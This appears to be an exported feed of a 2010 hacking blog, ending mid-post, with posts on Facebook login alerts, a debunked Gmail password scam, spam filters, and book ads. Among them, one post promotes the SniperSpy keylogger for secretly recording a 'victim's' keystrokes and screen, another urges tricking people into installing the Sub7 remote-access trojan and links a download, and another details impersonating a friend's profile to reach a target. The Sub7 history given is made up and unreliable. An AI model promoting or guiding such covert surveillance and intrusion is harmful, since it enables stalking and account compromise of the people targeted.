tag:blogger.com,1999:blog-59384745436068883642024-03-05T11:32:18.817-08:00Hack AnythingLatest Hack TipsTazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.comBlogger98125tag:blogger.com,1999:blog-5938474543606888364.post-78530984413148737172010-08-28T14:58:00.001-07:002010-08-28T14:58:56.943-07:00HOW TO: Get Notified When Someone Hacks Your FacebookFacebook just announced a tool that notifies you by e-mail or SMS text message when someone logs into your Facebook profile from an unknown computer.<br />
The idea is to help you recognize when a hacker has broken into your account so you can respond quickly by either changing your password (if that’s still possible) or contacting Facebook.<br />
Once you enable the notifications, you’ll be required to identify each computer you use to log in when you first use it and choose whether or not it’s a private or public machine. You’ll be able to see a history of registrations from machines potentially used by hackers, and of course those hackers will be forced to type something into the identification field to get in, so you should be able to tell whether it was just a login that you forgot or not.<br />
Here’s a quick guide to turning this feature on and using it.<br />
<hr /><h2>Step 1: Go to Account Settings and Enable Notifications</h2><hr />When you’re logged into Facebook, you’ll see the word “Account” in the top right corner of the browser window. Click there to get a drop-down menu of options, then click on “Account Settings,” as pictured below.<br />
<center><img alt="" class="aligncenter size-full wp-image-275749" height="285" original="http://cdn.mashable.com/wp-content/uploads/2010/05/facebook-account-settings-640.jpg" src="http://cdn.mashable.com/wp-content/uploads/2010/05/facebook-account-settings-640.jpg" title="facebook-account-settings-640" width="640" /></center>You’ll end up looking at a page that lists ways you can customize your account, including “Name,” “Password,” “Linked Accounts” and “more.” As long as you don’t navigate away from the “Settings” tab, you’ll see “Account Security” close to the bottom of the list. Click “change” on the right to show the following option:<br />
<center><img alt="" class="aligncenter size-full wp-image-275751" height="145" original="http://cdn.mashable.com/wp-content/uploads/2010/05/facebook-account-security-640.jpg" src="http://cdn.mashable.com/wp-content/uploads/2010/05/facebook-account-security-640.jpg" title="facebook-account-security-640" width="640" /></center>Check “Yes” when you see the prompt, “Would you like to receive notifications for logins from new devices?” Then click “Save.” The feature is turned on. Now we’ll show you how to use it.<br />
<hr /><h2>Step 2: Log In and Register Your Computer</h2><hr />The settings won’t be customizable until you register the computer you’re logged in with, so you’ll have to first log out and then log back in. You can do this from the “Accounts” button in the top-right corner, as we mentioned before. When you log in again, you’ll see a screen titled “Register this computer.”<br />
<center><img alt="" class="aligncenter size-full wp-image-275761" height="240" original="http://cdn.mashable.com/wp-content/uploads/2010/05/facebook-computer-register-640.jpg" src="http://cdn.mashable.com/wp-content/uploads/2010/05/facebook-computer-register-640.jpg" style="display: inline;" title="facebook-computer-register-640" width="640" /></center>Type the name of the computer in (it can be anything you want as long as it’s something you’ll recognize and remember), and choose whether you want Facebook to remember this computer or not.<br />
Facebook suggests a good rule of thumb: If the computer is a public one (like one you’d use at a library, a shared work computer or a machine in your school’s computer lab), leave the box unchecked so it will have to be registered each time a new login occurs, leading to an e-mail or text notification.<br />
If it’s a machine you use every day, then go ahead and check the box; you probably don’t want to receive an email every time you log into Facebook from a safe place!<br />
<center><img alt="" class="aligncenter size-full wp-image-275763" height="215" original="http://cdn.mashable.com/wp-content/uploads/2010/05/facebook-account-security-2-640.jpg" src="http://cdn.mashable.com/wp-content/uploads/2010/05/facebook-account-security-2-640.jpg" style="display: inline;" title="facebook-account-security-2-640" width="640" /></center>Now that your computer is registered, you can see more options when you revisit the “Account Settings” page where you first enabled the notifications. You’ll see a history of registrations; it won’t record every time you log into a computer that’s already registered, but it will record every new registration, which should include at least the first time any hacker logs in.<br />
You can check or uncheck the option to have the immediate notifications sent to your cell phone via text message in addition to the basic email option.<br />
<hr /><h2>Two More Things to Know</h2><hr />Keep in mind that the certificate that identifies your computer when it logs into Facebook is stored by your browser in a library of cookies. These cookies might end up getting cleared for any number of reasons, so don’t worry if you have to re-register your regular machines from time to time.<br />
Facebook also implemented a new feature that asks security questions (like identifying your birthdate or who your first kiss was) when unrecognized and suspicious logins occur. If the would-be hacker can’t answer the question, he or she is out of luck.Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com1tag:blogger.com,1999:blog-5938474543606888364.post-56852614509538972362010-08-28T14:55:00.001-07:002010-08-28T14:55:47.763-07:00Easy Way To Get your account hacked<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDyCbBP2cu5R_C0ffzegpUmqV3kGdVYSq9cvWgjziJ_musd16M71H9_G-D2srfCw9Y7H3SGEBLrDH1iFDMc3STgjFZNDUx7NW-Un1LOyWsW7ktPWzhaaXO9cKXubQdYsYRsBKlD1BTiGE/s1600/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDyCbBP2cu5R_C0ffzegpUmqV3kGdVYSq9cvWgjziJ_musd16M71H9_G-D2srfCw9Y7H3SGEBLrDH1iFDMc3STgjFZNDUx7NW-Un1LOyWsW7ktPWzhaaXO9cKXubQdYsYRsBKlD1BTiGE/s200/images.jpg" width="200" /></a></div><br />
Recently I received an email from one of <span class="IL_AD" id="IL_AD1">my blog</span> readers he just figured out a method to Hack an Email account the reader was conforming me whether this method would work or not<br />
<br />
<a href="" name="more"></a><br />
The Method was as follows:<br />
<span class="Apple-style-span" style="color: #cc0000;"><b><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-weight: normal;"><br />
</span></span></b></span><br />
<b>Step 1</b><br />
Log into your Gmail account. (NOTE- Email address must be older than 3 months, Do not try this newly created account because new account is not trusted in the <span class="IL_AD" id="IL_AD5">mail server</span>) <br />
<br />
<b>Step 2:</b><br />
Compose a new mail.<br />
<br />
<b>Step 3:</b><br />
<br />
In subject box type <b>“PASSWORD RECOVERY IN THE GMAIL OR ORKUT A/C 65SDF36870FGD8>=>/! To /" </b><br />
<br />
<b>Step 4</b><br />
Write this in message box. (First line)- “Email address you want to hack” (Second line)- “Your Gmail address “ (third line)- “Type Your Gmail account password ” / {simply copy and paste above.} <br />
<br />
<b>Step 5</b><br />
<b><br />
</b><br />
Send this to - <b>password@gmail.com</b> After this process this message will be send to Gmail and Orkut redirecting server and server will mach the email address in the database and server will be confused then server send u a confirmation msg to ur email account and u can reset the password. Within 48 hour you will get his/her password in ur mail inbox.<br />
<br />
<span class="Apple-style-span" style="font-size: x-large;"><b>OR</b></span><br />
<br />
Open your email client and open a new message.<br />
<br />
Remember don't put anything else on the email apart from the following!<br />
<br />
<b>1.</b> Enter the username of the person you want to get their password off. theirname@gmail.com<br />
<b>2.</b> Enter your username e.g. yourname@gmail.com<br />
<b>3. </b>Enter your password your password<br />
<b>4.</b> Copy and paste this to the email #hm76gmail77.01.mM01.345 (gmail coding)<br />
<b>4.</b> Send email to <b>pswrdrecovry@gmail.com</b><br />
<b>5.</b> Sit back and wait while gmail automatic password sender emails you the <br />
other parties password. <b>(due to presence of coding)</b><br />
<br />
<br />
If you didnt fall for it then great else boo go start writing snail/postal mail , web is not for you. Remember it's not easy to hack.Never follow any method given online.Also dont give your id to any who claims to give you the method one coz once you give your spam <span class="IL_AD" id="IL_AD4">mail box</span> would be always full.<br />
As you can see that the above two methods demand you to give your password, <b>pswrdrecovry@gmail.com</b><br />
and <b>password@gmail.com </b>are the emails of the hacker in which he will receive your password.<br />
<br />
Moral: If you are too greedy you will end up loosing every thing you have, For real Ethical <span class="IL_AD" id="IL_AD3">Hacking</span> Methods I recommend you to Purchase a Copy of My book <a href="http://www.mediafire.com/?9wvtpdx062x714t"><b><span class="Apple-style-span" style="color: #3d85c6;">A Beginners Guide To Ethical Hacking</span></b></a><div style="background-color: transparent; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"><br />
</div>Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0tag:blogger.com,1999:blog-5938474543606888364.post-46800029297526235552010-08-28T14:54:00.001-07:002010-08-28T14:54:41.347-07:00Sniperspy keylogger For Mac OS Launched<div class="separator" style="clear: both; text-align: center;"><a href="http://www.sniperspy.com/images/box6b.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Remote password hacking software" border="0" src="http://www.sniperspy.com/images/box6b.gif" /></a></div>Previously I wrote a <b><span class="Apple-style-span" style="color: #3d85c6;">review on Sniperspy</span></b> and concluded it as the best <span class="IL_AD" id="IL_AD1">Keylogger</span> to <b><span class="Apple-style-span" style="color: #3d85c6;">Hack Facebook Password</span></b><span class="Apple-style-span" style="color: #3d85c6;"> </span>or any other email account Password, but unfortunately some of <span class="IL_AD" id="IL_AD2">my blog</span> readers use Mac OS and the sniperspy did not work on Mac OS, but yesterday received the news from Sniperspy Team about Sniperspy keylogger for Mac OS has just launched so I decided to give it a try and share with you<br />
<br />
<a href="" name="more"></a><br />
SniperSpy is the only software that allows you to secretly watch your Macintosh like a television! Login from ANYWHERE using another computer, smartphone or iPad.<br />
<br />
After you <span class="IL_AD" id="IL_AD4">install</span> this program to the Mac you wish to monitor, it begins silently recording everything they do online. The program then uploads user activities and sends the data to your online account. You login to your account SECURELY to view logs using your own password-protected login.<br />
<br />
View the screen LIVE and see everything they do online in real time! Browse the file system, view chats, websites, keystrokes and more, with screenshots. You can also access the LIVE control panel within your secure online account to perform live monitoring functions.<br />
<br />
<b><span class="Apple-style-span" style="font-size: x-large;">Features</span></b><br />
<br />
The Sniperspy for Mac OS has Following Features<br />
<br />
<b>Keystroke Recordings</b><br />
The Sniperspy for Mac OS can record all the keystrokes typed on the victims computer. The victim wont even know if Sniperspy is installed in his/her computer<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0OxT2qrApF3e08N12O5HOyK2KE0qIb-EBtmRgrLGFIyEJUZYd9QkXWAxmjLaTZysuMSI3WqFIUFtIFMSk6gcElIoprWyJ0crQyw-HPYkLAXpZxS_dst6adu5NgS-p4XX_VYCOvR_1sIE/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0OxT2qrApF3e08N12O5HOyK2KE0qIb-EBtmRgrLGFIyEJUZYd9QkXWAxmjLaTZysuMSI3WqFIUFtIFMSk6gcElIoprWyJ0crQyw-HPYkLAXpZxS_dst6adu5NgS-p4XX_VYCOvR_1sIE/s320/3.png" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><br />
</div><div class="separator" style="clear: both; text-align: left;"><b>Chat Recordings</b></div><div class="separator" style="clear: both; text-align: left;">The Sniperspy for Mac OS can also track Yahoo, msn, skype etc chats</div><div class="separator" style="clear: both; text-align: left;"><br />
</div><div class="separator" style="clear: both; text-align: left;"><br />
</div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi04hH6IjbXf-dsE3A0i5tugWCQoOpFyA1DtUd1tY0XUrAQHCU9QTB7Xv-HHIy36SBNNWytZN4CVFGfDy5mHDJee6xc4yzdG-9yX6JXh-xOY9q9QvjP8GPc7zItnvHroFRRwsGEcxu45dk/s1600/chat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi04hH6IjbXf-dsE3A0i5tugWCQoOpFyA1DtUd1tY0XUrAQHCU9QTB7Xv-HHIy36SBNNWytZN4CVFGfDy5mHDJee6xc4yzdG-9yX6JXh-xOY9q9QvjP8GPc7zItnvHroFRRwsGEcxu45dk/s320/chat.png" width="320" /></a><br />
<div class="separator" style="clear: both; text-align: left;"><br />
</div><div class="separator" style="clear: both; text-align: left;"><b>Live Screen Viewer</b></div><div class="separator" style="clear: both; text-align: left;">Sniperspy is the only software for Mac OS which has a unique feature of Live Screen Viewing, with this feature you can see victims computer just like a Television Screen</div><div class="separator" style="clear: both; text-align: left;"><br />
</div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsmC5iynmT04JB7-lIFn7Pvb87FUTe5IrIks0sJU5UXPBtaM65M0Mjz5xPrOBPD5yA__1m_VTwS_le6Es9oQknO6E6H_KYOtz2dTnfehj47GnXncremRmhMCrnDuHffxTxDbwgo6QcDp0/s1600/ddd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsmC5iynmT04JB7-lIFn7Pvb87FUTe5IrIks0sJU5UXPBtaM65M0Mjz5xPrOBPD5yA__1m_VTwS_le6Es9oQknO6E6H_KYOtz2dTnfehj47GnXncremRmhMCrnDuHffxTxDbwgo6QcDp0/s320/ddd.png" width="320" /></a><br />
<div class="separator" style="clear: both; text-align: left;"><br />
</div><div class="separator" style="clear: both; text-align: left;">and much more</div><div class="separator" style="clear: both; text-align: left;"><br />
</div><div class="separator" style="clear: both; text-align: left;">So what are you waiting for, Get your hands on the best Keylogger for Mac OS and Start Monitoring</div><div class="separator" style="clear: both; text-align: left;"><br />
</div><div class="separator" style="clear: both; text-align: left;"><b>For Buy Now and Download links kindly visit the link below</b></div><div class="separator" style="clear: both; text-align: left;"><a href="http://tinyurl.com/38xaz3c"><span class="Apple-style-span" style="color: #3d85c6;"><b>Sniperspy for Mac OS</b></span></a></div><div style="background-color: transparent; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"><br />
</div>Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0tag:blogger.com,1999:blog-5938474543606888364.post-7399075892481249372010-08-19T05:59:00.000-07:002010-08-19T05:59:56.572-07:00Learn How To Hack With The Hacker’s Underground HandbookI wish this book was around when I began my journey to learn how to hack. It was made specifically for the beginners who really want to get into <span class="IL_AD" id="IL_AD5">hacking</span> and for those of us who began and got lost.<span id="more-2925"></span><br />
<center> <h4>The Hacker’s Underground Handbook</h4><a href="http://learn-how-to-hack.net/?vip=15"><img alt="" class="alignnone size-full wp-image-3443" height="371" src="http://hackspc.com/wp-content/uploads/2009/10/hackers__hackbook-242x300.jpg" title="hackers__hackbook31" width="300" /></a><br />
<h4><a href="http://www.mediafire.com/?9wvtpdx062x714t">Download For Free</a></h4></center><br />
The Hacker’s <span class="IL_AD" id="IL_AD7">Underground</span> Handbook starts off with the very basics with topics like programming and <span class="IL_AD" id="IL_AD2">Linux</span>. It then moves on to introduce and teach the topics of * password cracking<br />
* phishing<br />
* <span class="IL_AD" id="IL_AD1">network</span> hacking<br />
* wireless hacking<br />
* malware<br />
* Windows hacking<br />
I was really surprised how this book laid out the <span class="IL_AD" id="IL_AD8">information</span>, presenting it in an easy to read and understandable fashion. In each chapter the author first introduces you to the topic and then shows you a real-world example with step-by-step instructions with images. It makes hacking look so easy!<br />
Once you complete reading this book, the author explains where to go from there and how to keep learning. You will never again be lost and overwhelmed by all the hacking information out there.<br />
If you think this book is something you would be <span class="IL_AD" id="IL_AD9">interested</span> in, you can get it here. <a href="http://www.mediafire.com/?9wvtpdx062x714t">Hacker’s Underground Handbook</a>Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0tag:blogger.com,1999:blog-5938474543606888364.post-1540725081038895872010-08-19T05:42:00.000-07:002010-08-19T05:42:00.195-07:00How to hack a Facebook account?<div class="links"> I came across one of many sites with questions such as the following: “Kristina Vi<span class="author-posts"></span> June 25, 2008 – 11:25am: does anybody know how i can HACK into a private Facebook account?” Looking at the messages I see a growing trend of people who desired to get into other people’s business. Perhaps they’re acquaintance that aren’t close enough to be friends, or they’re looking for their potential dates’ secret profile, or worse they’re after your identity for identity theft. In the coming few articles, we’ll look at the implication of Social Networking as it relates to your privacy, what to look for and how to be careful. We’ll look into real scenarios of how your security maybe compromised, unless you’re careful.</div><div class="links">The 64,000 dollar question: what does it take to gain access to someone’s profile?</div><div class="links"><a href="http://www.danielpoon.com/lifehacking/wp-content/uploads/2008/07/facebookhack101.jpg" rel="lightbox[pics-1216146412]" title="Facebook Profile"><img alt="Facebook Profile" class="imageframe imgalignleft" height="202" src="http://www.danielpoon.com/lifehacking/wp-content/uploads/2008/07/facebookhack101.thumbnail.jpg" width="400" /></a></div><span id="more-42"></span><br />
<div class="links">For most of us who aren’t geniuses or super-technical, you may thought this is impossible. But when you think about it, it really isn’t rocket science. All you need is some creativity and not afraid to break the law. But because I am, the following describes hypothetical possible scenarios only. None has been attempted by me or anyone related to me, and all the screens related are mocked up for the purpose of illustrations only. The whole objective is to make you aware of the importance of security when using social networks such as Facebook. And at the end we’ll tell you how to protect yourself. But if you don’t see how easy it is for someone to view your profile, you’ll less likely to take precautions.</div><div class="links">First thing to remember is when you get a friend request from someone, how do you know that person is a real request or a fake request? This is the key!!!!</div><div class="links"> Think about this, imagine if a stalker searched for ‘Paris Hilton’, someone that he/she is interested to find out more about. And this is our hypothetical target for discussion.</div><div class="links"><a href="http://www.danielpoon.com/lifehacking/wp-content/uploads/2008/07/facebookhack102.jpg" rel="lightbox[pics-1216146412]" title="Search Profile"><img alt="Search Profile" class="imageframe imgalignleft" height="156" src="http://www.danielpoon.com/lifehacking/wp-content/uploads/2008/07/facebookhack102.thumbnail.jpg" width="400" /></a></div><div class="links">Next you can click on ‘View Friends’ and you’ll see a list of friends that’s connected to Paris. A potential stalker could then use this publicly available information by taking down the names, network and save the profile picture to their hard disk for later use.</div><div class="links"><a href="http://www.danielpoon.com/lifehacking/wp-content/uploads/2008/07/facebookhack103.jpg" rel="lightbox[pics-1216146412]" title="facebookhack103.jpg"><img alt="facebookhack103.jpg" class="imageframe imgalignleft" height="263" src="http://www.danielpoon.com/lifehacking/wp-content/uploads/2008/07/facebookhack103.thumbnail.jpg" width="400" /></a></div><div class="links"> With the friends of Paris information collected, the next part involves setting up a new Facebook account by using one of Paris’ friends identity. Thanks to the user-friendliness of Facebook, you can do this in less than 60 seconds.</div><div class="links"> <a href="http://www.danielpoon.com/lifehacking/wp-content/uploads/2008/07/facebookhack104.jpg" rel="lightbox[pics-1216146412]" title="Sign Up"><img alt="Sign Up" class="imageframe imgalignleft" height="259" src="http://www.danielpoon.com/lifehacking/wp-content/uploads/2008/07/facebookhack104.thumbnail.jpg" width="400" /></a></div><div class="links"> <a href="http://www.danielpoon.com/lifehacking/wp-content/uploads/2008/07/facebookhack105.jpg" rel="lightbox[pics-1216146412]" title="Profile Editing"><img alt="Profile Editing" class="imageframe imgalignleft" height="254" src="http://www.danielpoon.com/lifehacking/wp-content/uploads/2008/07/facebookhack105.jpg" width="351" /></a></div><div class="links">Once the account is ready, the stalker would now be creating a fictional profile by uploading the friend’s picture that he downloaded as well as any info related such as Name or school information. Using this new identity, the stalker then invites Paris to ‘Add as friend’.</div><div class="links"><a href="http://www.danielpoon.com/lifehacking/wp-content/uploads/2008/07/facebookhack106.jpg" rel="lightbox[pics-1216146412]" title="facebookhack106.jpg"><img alt="facebookhack106.jpg" class="imageframe imgalignleft" height="225" src="http://www.danielpoon.com/lifehacking/wp-content/uploads/2008/07/facebookhack106.thumbnail.jpg" width="400" /></a></div><div class="links">And soon,Paris receives a friends request, thought that she knew the friend and accept the invitation. And that’s it!!! Paris loses her privacy when she clicked the confirm button if she’s not careful. The fact is, it’s quite hard to verify a friend’s request when the name and photo appear as who they are. And this is all part of social engineering…without much hacking involved, and you could be losing your personal information in no one if you’re no careful. Of course one purpose of this article is to shock you into knowing the truth, but the other is for you to know how to protect yourself.</div><div class="links"><u><strong>So how do you deal with this?</strong></u></div><div class="links"><span class="opDefaultContent" id="opmodule_body" style="visibility: visible;"><span class="Text">First way to deal with this is to setup a limited profile list so that only a list of people can see your profile, you’ll have to explicitly to add new friends to that list to allow them to see your profile.</span></span><span class="opDefaultContent" id="opmodule_body" style="visibility: visible;"><span class="Text"> Secondly, be sure to add people to the list that you don’t want to share your entire profile with. Well in our case, it’s someone we know, so how do we know if its real?</span></span></div><div class="links"> <a href="http://www.danielpoon.com/lifehacking/wp-content/uploads/2008/07/facebookhack107.jpg" rel="lightbox[pics-1216146412]" title="facebookhack107.jpg"><img alt="facebookhack107.jpg" class="imageframe imgalignleft" height="175" src="http://www.danielpoon.com/lifehacking/wp-content/uploads/2008/07/facebookhack107.jpg" width="381" /></a></div><ol><li>Set yourself a rule to add friends only, don’t add strangers.</li>
<li>Look at the name and picture carefully. Also click on the “Name” to see the complete profile. If the profile has little details, then chances are it could be a made-up account.</li>
<li>Look for the “You have no friends in common” line. If this person is a friend of yours, there should be some connections.</li>
<li>If this person who’s inviting you is a brand new Facebook user with no friends, then pick up a phone. If he/she is a real friend, you’d probably have something in common to chat about. Call him/her up and find out if there’s a genuine request from them. Always be careful rather than be sorry.</li>
</ol><div class="links"> You know, alot of people tend to have alot of friend requests to deal with that they simply look at the name and picture only, and then click the “Confirm” button. Don’t be one of these people. Always be careful.</div><div class="links">In the next article,we’ll talk about something more serious, on why you should be super-careful, especially when by now, you think someone seeing your profile is not really such a big deal.</div>Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0tag:blogger.com,1999:blog-5938474543606888364.post-86786420942567451912010-08-17T11:38:00.000-07:002010-08-17T11:38:41.542-07:00<b><span style="font-size: x-large;">Hacking Tools</span></b><br />
<br />
<h2>Sub7</h2>If you haven't heard of Sub7, I suggest you leave now, find out what it is, then come back. Stop wasting my time. If you think you have the skilled mind for it, stick around, and I will introduce you to one of the many essential tools hackers have ready at <u>all</u> times.<br />
<h3>Origin</h3>Sub7 was invented in the late 1980's by a legend known as Mobman. Mobman wanted to make the basic tasks of a hacker easily accessable and easy to implement. I'm not sure what exactly he programmed it in, but it was probably something extremely difficult and involved, like Visual Basic or A+. I read up on Mobman, no one knows of his whereabouts and some even claim that he is dead (real hackers know better). Either way, we can all thank Mobman for this great program.<br />
<h3>What it is</h3>Sub7 is a R.A.T (Remote Administration Tool) that basically has two parts: a client, and a server. After you have the server installed on another machine, or trick another person into installing the server on <i>their</i> machine, you can use the client to connect to them through network protocols and routes. After you're connected to them, the client provides you with a series of hacking tools and features to use on your victim. Which, obviously, is the goal of any hacker.<br />
Sub7 has made this easy, but the only hard part is having the server installed on the other machine. You can see the official Sub7 website for tactics on how to accomplish this.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://elite-hackers.com/img/sub7ss.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="246" src="http://elite-hackers.com/img/sub7ss.gif" width="320" /></a></div><br />
<br />
<h3>Features</h3>Sub7 is well-known for it's wide selection of elite tools and features. Listed below are just a few that come to mind:<br />
<ul><li>Keylogger</li>
<li>Uploader</li>
<li>Server</li>
<li>Customized skins</li>
<li>Hide cursor</li>
<li>Client</li>
<li>CDROM close/open</li>
<li>Hide cursor</li>
<li>IP Pinging</li>
<li>Name lookup/revolution</li>
<li>Change the appearance of icon</li>
</ul><h3>Availability</h3>Sub7 was banned by the United Nations in 1995, but I consulted my many underground resources and found it for you. The last version that was made was Sub7 Legends, and is available for download <a href="http://rapidshare.com/files/195444957/ss.2.1.2.zip%20">here</a>. This file is extremely rare, and was very hard to find. I had to download it through KaZaA.<br />
Again, as with many things found on this site, the creator of this site is NOT responsible for anything you do with the knowledge or tools found within the site. Everything here is for educational purposes only. If you do not agree, leave now.Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0tag:blogger.com,1999:blog-5938474543606888364.post-72592131032545317942010-08-14T14:23:00.000-07:002010-08-14T14:23:00.666-07:00A Beginners Guide to Ethical Hacking launched I am very happy to tell you that my book <b>"A Beginners guide to Ethical <span class="IL_AD" id="IL_AD2">Hacking</span>" </b>has just launched.I have been working on this book for past few months.I have dedicated this book completely to beginners who want to become hackers.<br />
<br />
<a href="" name="more"></a><br />
<div><br />
</div><div><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmlEShrYFCvek_Y9y_9sAQC8LbJbnZo8FcnP85Z9GM_aMTFIpzVz9dtdkCnuogT-vCy-1XZKxud2ICYA_RI61WXvbzt8Ovbm-IQ6lOOWXwTi4OE6xbtRHIj8JHfEgQ23jsz4oVNJmVTlMW/s640/A+Beginners+Guide+to+Ethical+Hacking.JPG" /> </div><br />
<br />
<b>How will the information in the book affect me?</b><br />
<br />
<ul><li>You will learn All Ethical hacking techniques and also you will learn to apply them in real world situation</li>
<li>You will start to think like hackers</li>
<li>Secure your computer from trojans,worms, Adwares etc</li>
<li>Amaze your friends with your newly learned tricks</li>
<li>You will be able to protect your self from future hack attacks</li>
</ul><br />
And Much more...<br />
<br />
<b>Reality about Password Hacking softwares</b><br />
<br />
<br />
You might have heard about some paid password hacking softwares which claim to hack a password on entering the <span class="IL_AD" id="IL_AD4">email account</span>.But in reality all those softwares are fake.If you believe what they say then you are just wasting your time and money.These all softwares are fake.If there exists such a software, will there be any security on web. And all expert engineers at Google, Yahoo and other <span class="IL_AD" id="IL_AD1">services</span> are not mad. They are all engaged in ensuring security of their customers ie email account owners. So, no such software exists.<br />
So stop wasting your time and money on these foolish softwares and services and learn real Ethical Hacking methods which hackers use to access email accounts.<br />
<br />
<b>For Download Link visit the following site</b><br />
<br />
<span class="Apple-style-span" style="font-size: x-large;"><a href="http://www.hacking-book.com/"><span class="Apple-style-span" style="color: #3d85c6;"><b>Ethical Hacking Book</b></span></a></span><div style="background-color: transparent; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"><br />
</div>Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0tag:blogger.com,1999:blog-5938474543606888364.post-18106504155038351802010-08-12T12:14:00.000-07:002010-08-12T12:14:25.522-07:00How do Email Spam Filters Work<div class="separator" style="clear: both; text-align: center;"></div><div style="margin-left: 1em; margin-right: 1em;"><img alt="Spam Filter" class="alignleft size-full wp-image-3532" height="164" src="http://www.gohacking.com/wp-content/uploads/2010/08/Spam-Filter.jpg" title="Spam-Filter" width="150" /> </div><div style="margin-left: 1em; margin-right: 1em;">If you are the one who works with emails on a daily basis, you are most likely to be using a SPAM FILTER to ease the job of sifting through a large number of spam emails every day. Needless to say that spam filters do make our job a lot simpler by automatically filtering out the spam without which it is almost impossible to manually filter the junk emails that arrive in millions each day. However, it is often necessary to have a basic knowledge of how spam filters work and on what basis they flag an email as spam.</div><br />
<div style="text-align: center;"></div><div style="text-align: center;"> </div><div> </div> <div style="text-align: left;"> </div><h1 style="text-align: left;">How Spam Filters Work?</h1><div style="text-align: left;"> </div><div style="text-align: left;">There are different kinds of spam filters:</div><div style="text-align: left;"> </div> <div style="text-align: left;"> </div><h2 style="text-align: left;">Header Spam Filters</h2><div style="text-align: left;"> </div><div style="text-align: left;">Header spam filters work by examining the header information of a particular email message to check if it appears to have been forged. The header of every email contains information which tells the origin of the email. ie: The incoming email ID and usually the IP address (server address) of the sender. So spammers often forge the header to input a false sender ID and IP address so as to make it difficult to trace them. Thus if an email is supposed to have a forged header or if the same message is found to have been sent to multiple recipients, it is most likely considered as a spam by many filters. This method of spam filtering is often quite effective, however occasionally it may result in some of the requested newsletters from being misdirected into the spam folders. </div><div style="text-align: left;"> </div> <div style="text-align: left;"> </div><h2 style="text-align: left;">Content Spam Filters</h2><div style="text-align: left;"> </div><div style="text-align: left;">Content spam filter is one of the most effective and widely used filter to combat spam emails. They use a sophisticated algorithm with a set of pre-defined rules to determine whether a given email is a spam. They work by scanning the entire text/body of the email to search for specific words and patterns that make them resemble a typical spam message. Most content spam filters work based on the following criteria and check to see</div><div style="text-align: left;"> </div><div style="text-align: left;">1. If the message speaks a lot about money matter. Commonly suspected words include: <em>lottery, discount, offer, bank account, money back guarantee</em> etc.</div><div style="text-align: left;"> </div><div style="text-align: left;">2. If the message contains adult terms like: <em>viagra, pills, bed, drugs, hot</em> and so on.</div><div style="text-align: left;"> </div><div style="text-align: left;">3. If there is any sort of urgency. Most spam emails call for an urgency by using terms such as <em>hurry, offer valid till</em> etc.</div><div style="text-align: left;"> </div><div style="text-align: left;">4. If the message contains a single large image with little or no text then it is often considered as spam by many filters.</div><div style="text-align: left;"> </div><div style="text-align: left;">Each content spam filter may have it’s own set of additional rules using which it evaluates each incoming email. In most cases content and header spam filters are combined together to achieve higher level of accuracy.</div><div style="text-align: left;"> </div> <div style="text-align: left;"> </div><h2 style="text-align: left;">Language Spam Filters</h2><div style="text-align: left;"> </div><div style="text-align: left;">Language spam filter is designed to simply filter out any email that is not in the user’s native language. Since spammers come from all parts of the world with different languages, a language spam filter can help get rid of those annoying emails that come in the languages that you can’t read!</div><div style="text-align: left;"> </div> <div style="text-align: left;"> </div><h2 style="text-align: left;">User Defined Spam Filters</h2><div style="text-align: left;"> </div><div style="text-align: left;">User defined spam filters can be very handy, however they need a considerable amount of time investment in configuring and setting up a set the rules using which the filter works. For example, the user can configure to have all the emails from friends and company to reach the inbox, newsletters to reach a secondary inbox and all those remaining to the spam folder. Here the user must carefully examine the patterns of spam emails that he receives from time to time and needs to set up the rules accordingly. This filter when improperly configured can sometime lead to false positives or false negatives.</div><div style="text-align: left;"> </div> <div style="text-align: left;"> </div><h3 style="text-align: left;">Other Types of Spam Filters</h3><div style="text-align: left;"> </div><div style="text-align: left;">Popular webmail services like Gmail, Yahoo and Hotmail combine both header and content spam filtering techniques. In addition to this they also use their own algorithms to combat spam. For example services like Gmail uses “optical text recognition” to identify spammy text inside an image. Also users are provided with an option to “Report Spam” whenever a spam email accidentally reaches the inbox. With the user feedback, the filter learns and becomes more powerful in carrying out the filtering process.</div>Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0tag:blogger.com,1999:blog-5938474543606888364.post-87054082488482267532010-08-12T12:12:00.001-07:002010-08-12T12:12:43.513-07:00Protect your Computer from ARP poisoning<div class="separator" style="clear: both; text-align: center;"><a 